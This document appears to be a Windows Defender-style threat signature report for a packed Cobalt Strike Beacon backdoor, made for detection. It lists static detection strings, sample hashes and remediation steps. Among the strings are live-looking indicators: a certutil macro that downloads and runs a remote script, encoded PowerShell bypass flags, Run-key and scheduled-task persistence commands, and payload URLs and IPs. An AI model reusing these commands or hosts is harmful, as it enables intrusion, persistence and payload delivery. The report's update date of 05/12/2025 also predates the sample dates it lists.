Backdoor:Win64/CobaltStrike!pz - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:Win64/CobaltStrike!pz
Classification:
Type: Backdoor
Platform: Win64
Family: CobaltStrike
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !pz (packed or compressed to evade detection)
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Backdoor (provides unauthorized remote access), 64-bit Windows platform, family CobaltStrike

Summary:

This detection identifies a Cobalt Strike Beacon, a potent post-exploitation framework used by advanced threat actors. The threat establishes persistence via scheduled tasks and provides the attacker with full remote control to execute commands, steal data, and move laterally within the network.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
 - S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
 - C:\Users\Public\Music\cia.plan (PEHSTR)
 - !C:\Users\Public\Music\SideBar.dll (PEHSTR)
 - artifact64big.dll (PEHSTR_EXT)
 - artifact32big.dll (PEHSTR_EXT)
 - K[ZKK\OKM (PEHSTR_EXT)
 - GetCommandLineA (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
 - temp.dll (PEHSTR_EXT)
 - ././., (PEHSTR_EXT)
 - .,./., (PEHSTR_EXT)
 - /posts/ (PEHSTR_EXT)
 - /ivc/ (PEHSTR_EXT)
 - /k&>}2 (SNID)
 - vN.6b (SNID)
 - Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
 - HttpAddRequestHeadersA (PEHSTR_EXT)
 - beacon.dll (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - \\.\pipe\bypassuac (PEHSTR_EXT)
 - \\.\pipe\keylogger (PEHSTR_EXT)
 - /send%s (PEHSTR_EXT)
 - rcap:// (PEHSTR_EXT)
 - \\.\pipe\netview (PEHSTR_EXT)
 - \\.\pipe\powershell (PEHSTR_EXT)
 - \\.\pipe\screenshot (PEHSTR_EXT)
 - \\.\pipe\elevate (PEHSTR_EXT)
 - \\.\pipe\hashdump (PEHSTR_EXT)
 - Global\SAM (PEHSTR_EXT)
 - \\.\pipe\portscan (PEHSTR_EXT)
 - \\%s\ipc$ (PEHSTR_EXT)
 - \\.\pipe\sshagent (PEHSTR_EXT)
 - COBALTSTRIKE (PEHSTR_EXT)
 - %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
 - \\%s\pipe\msagent_%x (PEHSTR_EXT)
 - [command] (PEHSTR_EXT)
 - \\.\pipe\mimikatz (PEHSTR_EXT)
 - test.dll (PEHSTR_EXT)
 - shellcodeexecute (PEHSTR_EXT)
 - Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
 - CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
 - github.com/mitre/gocat/ (PEHSTR_EXT)
 - AS\e\%r (SNID)
 - could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
 - spawn::decrypting... (PEHSTR)
 - \regedit.exe (PEHSTR)
 - tps://122.228.7.225/admin?file= (PEHSTR_EXT)
 - 122.193.130.74 (PEHSTR_EXT)
 - 121.207.229.145 (PEHSTR_EXT)
 - File Download Success. (PEHSTR_EXT)
 - download.exe (PEHSTR_EXT)
 - /checker (PEHSTR_EXT)
 - YG@JG\ (PEHSTR_EXT)
 - |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
 - HTTP/1.1 200 OK (PEHSTR_EXT)
 - %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
 - CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
 - r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
 - /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v  (PEHSTR_EXT)
 -  /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
 - 7I.S_T (SNID)
 - \.\pipe\Vmware.0000000000.0002 (PEHSTR_EXT)
 - 127.0.0.1 (PEHSTR_EXT)
 - gigabigsvc.dll (PEHSTR_EXT)
 - cmd.exe (PEHSTR_EXT)
 - \>~gZ (SNID)
 - shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
 - sync.(*Mutex).Lock (PEHSTR_EXT)
 - crypto/cipher.xorBytes (PEHSTR_EXT)
 - shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
 - runtime.injectglist (PEHSTR_EXT)
 - sync.(*Mutex).lockSlow (PEHSTR_EXT)
 - sync.(*entry).load (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
 - crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
 - crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
 - crypto/aes.decryptBlockGo (PEHSTR_EXT)
 - 0.bin (PEHSTR_EXT)
 - \Bypass_AV.pdb (PEHSTR_EXT)
 - Bypass_AV.pdb (PEHSTR_EXT)
 - InternetReadFile(...) (PEHSTR_EXT)
 - HttpSendRequestA(...) (PEHSTR_EXT)
 - /htEp (PEHSTR_EXT)
 - oshi.at (PEHSTR_EXT)
 - UserInitMprLogonScript (PEHSTR_EXT)
 - notepad.exe (PEHSTR_EXT)
 - %s as %s\%s: %d (PEHSTR_EXT)
 - beacon.x64.dll (PEHSTR_EXT)
 - Updater.dll (PEHSTR_EXT)
 - Content-Type: application/octet-stream (PEHSTR_EXT)
 - DllMain (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - hovitdz.dll (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%ckirito\asuna (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cwarcraft\dota (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cralka\ribak (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cmark\dabollo (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cpapizor\gojo (PEHSTR_EXT)
 - cmd /c C:\Windows\Temp (PEHSTR_EXT)
 - DllGetClassObject (PEHSTR_EXT)
 - executeShellcode (PEHSTR_EXT)
 - \SLN\HRM_SUB\ (PEHSTR_EXT)
 -  \HRM_SUB.pdb (PEHSTR_EXT)
 - AVBypass.pdb (PEHSTR_EXT)
 - http_dll.dat (PEHSTR_EXT)
 - weeulsf763bs1.dll (PEHSTR_EXT)
 - //rs.qbox.me/chtype/ (PEHSTR_EXT)
 - Dbak/chdb:qiniu.png (PEHSTR_EXT)
 - 252.72.131.228 (PEHSTR_EXT)
 - 240.232.200.0 (PEHSTR_EXT)
 - 0.0.65.81 (PEHSTR_EXT)
 - 65.80.82.81 (PEHSTR_EXT)
 - 86.72.49.210 (PEHSTR_EXT)
 - 101.72.139.82 (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Aborting... (PEHSTR_EXT)
 - -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
 - Press any key... (PEHSTR_EXT)
 - http://144.48.240.85/18.exe (PEHSTR_EXT)
 - 4Bejz8txQ/rDnf (PEHSTR_EXT)
 - ShellCodeLoader\bin (PEHSTR_EXT)
 - http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - \x91\xe1\xa19 (PEHSTR_EXT)
 - \xE9\xE8\Xa1 (PEHSTR_EXT)
 - 0ZNA3EZ4g.exe (PEHSTR_EXT)
 - 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
 - legacy.chunk.js (PEHSTR_EXT)
 - windows\temp\ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
 - namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
 - [i] Injecting The Reflective DLL Into (PEHSTR_EXT)
 - RlfDllInjector.pdb (PEHSTR_EXT)
 - windows.ini (PEHSTR)
 - mgur730yw1.dll (PEHSTR_EXT)
 - \Parallel_Asis.dll (PEHSTR_EXT)
 - mscorsvc.dll (PEHSTR_EXT)
 - 1.dll (PEHSTR_EXT)
 - Loader.nim (PEHSTR_EXT)
 - bcmode.nim (PEHSTR_EXT)
 - Test.dll (PEHSTR_EXT)
 - \.\PhysicalDrive0 (PEHSTR_EXT)
 - temp\packed64-temp.pdb (PEHSTR_EXT)
 - \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
 - .sedata (PEHSTR_EXT)
 - .gehc (PEHSTR_EXT)
 - Release\movenpeak.pdb (PEHSTR_EXT)
 - System.Web.ni.dll (PEHSTR_EXT)
 - 0cobaltstrike-chtsec (PEHSTR_EXT)
 - ({y#y/ (SNID)
 - DetectAttack.dll (PEHSTR_EXT)
 - x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
 - nfvurg856lk63.dll (PEHSTR_EXT)
 - programdata\3bef479.tmp (PEHSTR_EXT)
 - Release\SetupEngine.pdb (PEHSTR_EXT)
 - Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
 - ;\$ r (PEHSTR_EXT)
 - PolicyPlus.Resources.resources (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
 - enhanced-google.com (PEHSTR_EXT)
 - Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
 - E2/L9L$@ (PEHSTR_EXT)
 - CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
 - \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
 - Memory permissions changed successfully: PAGE_EXECUTE (PEHSTR_EXT)
 - QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
 - New Project 2.exe (PEHSTR_EXT)
 - raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
 - .retplne (PEHSTR_EXT)
 - wsc_UUIDS.dll (PEHSTR_EXT)
 - D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
 - on_avast_dll_unload (PEHSTR_EXT)
 - main.AesDecrypt (PEHSTR_EXT)
 - peloader\peloader_64\ (PEHSTR_EXT)
 - \Release\peloader (PEHSTR_EXT)
 - StartDllLoadData (PEHSTR_EXT)
 - vscodeWorkSpace\shellcode\whiteandblack (PEHSTR_EXT)
 - AvastSvc.exe (PEHSTR_EXT)
 - kpm_tray.exe (PEHSTR_EXT)
 - AtomLdr.dll (PEHSTR_EXT)
 - A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
 - RunScript (PEHSTR_EXT)
 - PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
 - test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
 - \SudSolver.pdb (PEHSTR_EXT)
 - jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
 - api.gogleapi.click/file/System/ (PEHSTR_EXT)
 - Projects\evasionC_go\workingSpace (PEHSTR_EXT)
 - _seh_filter_dll (PEHSTR_EXT)
 - BoevVBacejSmwcZ (PEHSTR_EXT)
 - \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
 - /|bD;X (SNID)
 - MACOSX\pdf.pdf (PEHSTR_EXT)
 - sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
 - nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
 - yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
 - PT2MtVR9gr5.go (PEHSTR_EXT)
 - CallDLLDynamic.pdb (PEHSTR_EXT)
 - per_thread_data.cpp (PEHSTR_EXT)
 - [*] Executing (PEHSTR_EXT)
 - ConsoleApp1.exe (PEHSTR_EXT)
 - n/q9) (SNID)
 - ,!B2,/H;t$ (PEHSTR_EXT)
 - krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - GEMS\GEMS\obj\Release\GEMS.pdb (PEHSTR_EXT)
 - Users\Apocalypse\ (PEHSTR_EXT)
 - \Rust\client\1.pdb (PEHSTR_EXT)
 - 57k7w2hd52.8pfyh.ws:8443/TseNn7 (PEHSTR_EXT)
 - quiomnissitaliquidmolestias24.dll (PEHSTR_EXT)
 - xxxx.dll (PEHSTR_EXT)
 - DllUnregisterServer (PEHSTR_EXT)
 - /Mark\NewVirus\CPP\msedge\x64\Release\msedge.pdb (PEHSTR)
 - msedge.dll (PEHSTR)
 - http://www.flntp.ro/fintp.x64.bin (PEHSTR_EXT)
 - ConsoleApplication6.pdb (PEHSTR_EXT)
 - systeminfo.txt (PEHSTR_EXT)
 - dfbfdhbfddfbfdnhdfhfd.fll (PEHSTR_EXT)
 - D$.2D$FC (PEHSTR_EXT)
 - D$/2D$GC (PEHSTR_EXT)
 - C:\Users\Public (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - NewWYDll\NewWYDll\Release\NewWYDll.pdb (PEHSTR_EXT)
 - %s\updater.exe (PEHSTR_EXT)
 - %s\libcurl.dll (PEHSTR_EXT)
 - cobalt-strike-master\x64\Release\msedge.pdb (PEHSTR_EXT)
 - \Windows\CurrentVersion\Run (PEHSTR_EXT)
 - \mfehcs.exe (PEHSTR_EXT)
 - cmd /c taskkill /F /PID (PEHSTR_EXT)
 - \MyNewDLL\x64\Release\pdh.pdb (PEHSTR_EXT)
 - libEGL.dll.pdb (PEHSTR_EXT)
 - kapitalbankaz.azurewebsites.net/api/getit (PEHSTR_EXT)
 - InternetExplorer.pdb (PEHSTR_EXT)
 - http://149.28.222.244:8000/ (PEHSTR_EXT)
 - Shellcode decryption complete. (PEHSTR_EXT)
 - f574d29994a3adc68dcbd2a39596331713957734.bin.packed.dll (PEHSTR_EXT)
 - Wininet. (PEHSTR_EXT)
 - dll (PEHSTR_EXT)
 - Press <Enter> To Execute The Payload ... (PEHSTR_EXT)
 - \SophosUninstall.p (PEHSTR_EXT)
 - SophosFS.p (PEHSTR_EXT)
 - SophosNtpUninstall.p (PEHSTR_EXT)
 - SophosFSTelemetry.p (PEHSTR_EXT)
 - /CPNGXa3g1gm8hD3zsdW (PEHSTR_EXT)
 - lease\Project5.pdb (PEHSTR_EXT)
 - minimaaccusamusnihilvoluptaset90.dll (PEHSTR_EXT)
 - Decrypted %d... (%d %%) i = %d; full_length = %d (PEHSTR_EXT)
 - Decrypted %d...ok! (PEHSTR_EXT)
 - *,d:/th/ds/ext/aad (PEHSTR_EXT)
 - NLc0MDg9zP6VTvRMbffF0O23WgXbBZBl3PO9/14+ABQ= (PEHSTR_EXT)
 - atks.exe (PEHSTR_EXT)
 - ://0x1.social (PEHSTR_EXT)
 - 47.92.131.203 (PEHSTR_EXT)
 - Windows.pdb (PEHSTR_EXT)
 - .C0D. (PEHSTR_EXT)
 - main.xorDecrypt (PEHSTR_EXT)
 - main.AesDecryptCFB (PEHSTR_EXT)
 - main.refun (PEHSTR_EXT)
 - main.run (PEHSTR_EXT)
 - d20%:d20%:d20% d20%/d20%/d20% (PEHSTR)
 - 0% d20%/d20%/d20 (PEHSTR)
 - g('http://47.106.67.138:80/a')) (PEHSTR_EXT)
 - System.Management.Automation.AmsiUtils (PEHSTR_EXT)
 - main.AesDecryptByECB (PEHSTR_EXT)
 - main.PKCS7UNPadding (PEHSTR_EXT)
 - main.closeWindows (PEHSTR_EXT)
 - runtime.sysReserve (PEHSTR_EXT)
 - runtime.badctxt (PEHSTR_EXT)
 - runtime.allgadd (PEHSTR_EXT)
 - runtime.traceShuttingDown (PEHSTR_EXT)
 - runtime.traceLocker.GoSched (PEHSTR_EXT)
 - \$0E3 (PEHSTR)
 - lease\x64\overseer.pdb (PEHSTR_EXT)
 - axy1/TpcPcZwBtQYcCL6rREEc/8XLJ (PEHSTR_EXT)
 - maskdesk.info (PEHSTR_EXT)
 - /file (PEHSTR_EXT)
 - System32\notepad.exe (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - almounah/go-buena-clr (PEHSTR_EXT)
 - chrome_decrypt.log (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - f_u_c_k...... (PEHSTR_EXT)
 - Ran CobaltStrike (PEHSTR_EXT)
 - ReverseShell_%s_%s.exe (PEHSTR_EXT)
 - aLdbcGgcd@hdf;iff9igf5jgg/khg)khg (PEHSTR_EXT)
 - bWebdRgceNhdfHjehAjfh<lhi9lij6mij/njk(njk (PEHSTR_EXT)
 - fbdXhdeSiegOjfhGlhiAmij<mik9okl5okl.plm'qll!rnn (PEHSTR_EXT)
 - alfccahdfZjfhUkgjOmijHnklBqmm>qmn:rno6soo.sop'tpp!wsr (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware associated with this threat:
Filename: 63101038b04ac1387a6e8849f6a9c7723120c748a57d6.exe
SHA256: 63101038b04ac1387a6e8849f6a9c7723120c748a57d663491f81e3b88b96f37
Date: 28/01/2026
Filename: 13b0c7e965333eccf3233be205ce4360.exe
SHA256: ad195ae51946b4b4aad4fce944e58dc3f0b8c9d2f058314fb54ca476fe5daae5
Date: 20/01/2026
Filename: bc5cc133d250058080a284fb1f6ce394f588b8363d4ec.exe
SHA256: bc5cc133d250058080a284fb1f6ce394f588b8363d4ec7fa8af163acce309da6
Date: 17/01/2026
Filename: bcd332c9a77700156ef02bffec7d0c5a09dbf5c6ee2e9.exe
SHA256: bcd332c9a77700156ef02bffec7d0c5a09dbf5c6ee2e924a1eff56bbac70c801
Date: 14/01/2026
Filename: 0be5b92bd1e8acef055ef1f1de67aef5.exe
SHA256: 5a5c149b165ec4d6366c2ffdf1c9bfc2138577cb5b058ee852bdf4c6d978fd06
Date: 07/12/2025
Remediation Steps:
Immediately isolate the affected machine from the network to prevent lateral movement. Investigate the scope of the compromise, as other systems are likely affected. Remove identified malicious files and persistence mechanisms, reset all credentials on the system, and re-image the device from a known-good source.
=== END REPORT ===
This analysis was last updated on 05/12/2025.